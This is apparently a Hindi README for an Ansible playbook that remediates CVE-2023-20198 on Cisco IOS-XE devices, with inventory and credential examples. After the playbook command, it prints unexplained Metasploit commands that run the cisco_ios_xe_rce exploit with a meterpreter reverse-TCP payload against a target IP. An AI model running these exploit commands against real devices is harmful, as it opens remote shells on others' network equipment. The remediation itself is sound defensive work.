
उन स्थितियों की जाँच करें और उन्हें ठीक करें जो किसी IOS-XE डिवाइस को CVE-2023-20198 के प्रति संवेदनशील बनाती हैं।
इस रिपॉज़िटरी में कुछ Cisco डिवाइसों में पाए गए CVE-2023-20198 भेद्यता को सुधारने के लिए एक Ansible प्लेबुक शामिल है।
यह निम्नलिखित कार्य करती है:
CVE-2023-20198-Fix/
│
├── ansible.cfg # Ansible configuration file
├── group_vars/ # Directory for variables specific to groups of hosts
│ └── iosxe_devices.yml # Variable definitions for IOS-XE devices
├── inventory.yml # Inventory of hosts, including devices to target
└── remediate.yml # Playbook for remediating CVE-2023-20198
सुनिश्चित करें कि आपके नियंत्रण मशीन पर Ansible स्थापित है। यह प्लेबुक Ansible 2.9 या उससे नए संस्करण के लिए लिखी गई है।
Ansible कॉन्फ़िगर करें: अपनी पर्यावरण सेटिंग्स से मेल खाने के लिए ansible.cfg को संपादित करें।
अपने IOS-XE डिवाइसों की होस्ट जानकारी के साथ inventory.yml को अपडेट करें।
group_vars/iosxe_devices.yml में कोई भी आवश्यक चर परिभाषित करें। इसमें आपके IOS-XE डिवाइसों के लिए सामान्य सेटिंग्स, जैसे कनेक्शन सेटिंग्स और क्रेडेंशियल्स शामिल होने चाहिए।
इन्वेंटरी में एक नया IOS-XE डिवाइस जोड़ने के लिए, inventory.yml फ़ाइल को संपादित करें और नए होस्ट को उपयुक्त समूह के अंतर्गत जोड़ें:
iosxe_devices:
hosts:
vulnerable_router01:
ansible_host: 192.168.1.3
# ... other necessary variables
new_router01 को अपने डिवाइस के होस्टनाम से और ansible_* वेरिएबल्स को अपने डिवाइस के वास्तविक मानों से बदलें।
यदि आपको IOS-XE डिवाइसों के समूह के लिए क्रेडेंशियल्स या अन्य सेटिंग्स अपडेट करने की आवश्यकता है, तो group_vars/iosxe_devices.yml फ़ाइल को संपादित करें:
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password # Lab use only, store credentials responsibly!
ansible_become_method: enable
ansible_become_password: admin_password # Lab use only, store credentials responsibly!
# ... other variables
प्लेबुक को निष्पादित करने के लिए, निम्न कमांड का उपयोग करें:
ansible-playbook remediate.yml -i inventory.yml
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242 # Your target IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit



उत्पादन में प्लेबुक चलाने से पहले हमेशा अपने परिवर्तनों का परीक्षण नियंत्रित वातावरण में करें।
पासवर्ड और गुप्त कुंजियों जैसे संवेदनशील डेटा को Ansible Vault का उपयोग करके संग्रहीत करें। अपनी इन्वेंटरी या group_vars फ़ाइलों में सादे पाठ वाले क्रेडेंशियल्स को संग्रहीत न करें।
अतिरिक्त सुरक्षा उपायों और सर्वोत्तम प्रथाओं के लिए, Ansible का आधिकारिक दस्तावेज़ देखें।
कृपया सभी प्लेसहोल्डर मानों को अपने पर्यावरण के अनुरूप वास्तविक डेटा से बदलें। यह README Ansible अवधारणाओं जैसे इन्वेंटरी, चर और प्लेबुक चलाने की बुनियादी जानकारी मानता है।